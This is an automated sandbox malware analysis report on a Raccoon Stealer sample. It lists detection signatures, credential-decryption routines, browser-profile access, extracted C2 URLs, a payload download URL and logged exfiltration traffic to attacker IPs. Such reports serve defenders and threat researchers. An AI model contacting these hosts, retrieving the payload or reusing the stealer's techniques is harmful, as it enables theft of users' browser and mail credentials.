Windows Analysis Report Tk6dsSEyOC.exe

Overview

General Information

Sample Name: Tk6dsSEyOC.exe
Analysis ID: 528742
MD5: 3613e68843dd0c745f079a6ef51a6e6a
SHA1: 87f91a8e3bf01475cf3fe5a690374f95a4fb66c2
SHA256: 271453e30f708718f175654f2b3fb5f4438effb11a928656d58f0051b424c740
Tags: exe, RaccoonStealer

Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sigma detected: Suspicious Del in CommandLine
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: Tk6dsSEyOC.exe Virustotal: Detection: 49%
Source: Tk6dsSEyOC.exe ReversingLabs: Detection: 54%
Yara detected Raccoon Stealer
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://188.127.251.217/sys64.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://188.127.251.217/sys64.exe Virustotal: Detection: 12%
Machine Learning detection for sample
Source: Tk6dsSEyOC.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040E727 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData, 0_2_0040E727
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040D560 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, 0_2_0040D560
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0042770E CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 0_2_0042770E
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040F78B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 0_2_0040F78B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004278E1 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 0_2_004278E1
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040DC7B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, 0_2_0040DC7B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041E52C __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot, 0_2_0041E52C

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Unpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack
Uses 32bit PE files
Source: Tk6dsSEyOC.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb source: Tk6dsSEyOC.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb0= source: Tk6dsSEyOC.exe
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr, mozMapi32_InUse.dll.0.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmp, AccessibleMarshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmp, breakpadinjector.dll.0.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_0043DA90
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0045E752 FindFirstFileExW, 0_2_0045E752
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00434721 __EH_prolog,GetLogicalDriveStringsA, 0_2_00434721
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49767 -> 91.219.236.69:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49767 -> 91.219.236.69:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://91.219.236.162/masterdanteloma
Source: Malware configuration extractor URLs: http://185.163.47.176/masterdanteloma
Source: Malware configuration extractor URLs: http://193.38.54.238/masterdanteloma
Source: Malware configuration extractor URLs: http://74.119.192.122/masterdanteloma
Source: Malware configuration extractor URLs: http://91.219.236.240/masterdanteloma
Source: Malware configuration extractor URLs: https://t.me/masterdanteloma
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /masterdanteloma HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: t.me
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 91.219.236.69
Source: global traffic HTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 91.219.236.69
Source: global traffic HTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 91.219.236.69
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 1400 Host: 91.219.236.69
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.219.236.240 91.219.236.240
Source: Joe Sandbox View IP Address: 91.219.236.162 91.219.236.162
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Nov 2021 17:24:09 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Sun, 14 Nov 2021 14:06:13 GMT ETag: "619117d5-dfcff" Accept-Ranges: bytes
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Nov 2021 17:24:13 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Sun, 14 Nov 2021 14:06:12 GMT ETag: "619117d4-2b281b" Accept-Ranges: bytes
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.54.238
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.240
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmp String found in binary or memory: http://188.127.251.217/
Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmp String found in binary or memory: http://188.127.251.217/sys64.exe
Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmp String found in binary or memory: http://188.127.251.217/sys64.exe7e1bbc7bd
Source: Tk6dsSEyOC.exe, 00000000.00000003.316126752.0000000000553000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.316201744.000000000055A000.00000004.00000001.sdmp String found in binary or memory: http://193119.192.122/
Source: Tk6dsSEyOC.exe, 00000000.00000003.316146963.000000000056C000.00000004.00000001.sdmp String found in binary or memory: http://74.119.192.122/
Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427958773.000000004BC86000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427854051.0000000002E8E000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.428000904.000000004BC86000.00000004.00000010.sdmp String found in binary or memory: http://91.219.236.69/
Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp String found in binary or memory: http://91.219.236.69//l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b
Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp String found in binary or memory: http://91.219.236.69//l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b04
Source: Tk6dsSEyOC.exe, 00000000.00000003.427958773.000000004BC86000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.428000904.000000004BC86000.00000004.00000010.sdmp String found in binary or memory: http://91.219.236.69:80/_netfx4-system.web.routing_b03f5f7f11d50a3a_4.0.15671.0_none_a9bac3c753caa48
Source: ldap60.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ldap60.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.0.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.0.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp, nssckbi.dll.0.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: ldap60.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: ldap60.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: ldap60.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: ldap60.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ldap60.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.0.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://ocsp.accv.es0
Source: ldap60.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: ldap60.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: ldap60.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://repository.swisssign.com/0
Source: ldap60.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ldap60.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: ldap60.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Amcache.hve.0.dr String found in binary or memory: http://upx.sf.net
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: ldap60.dll.0.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.0.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nssckbi.dll.0.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.0.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nssckbi.dll.0.dr String found in binary or memory: https://www.catcert.net/verarrel
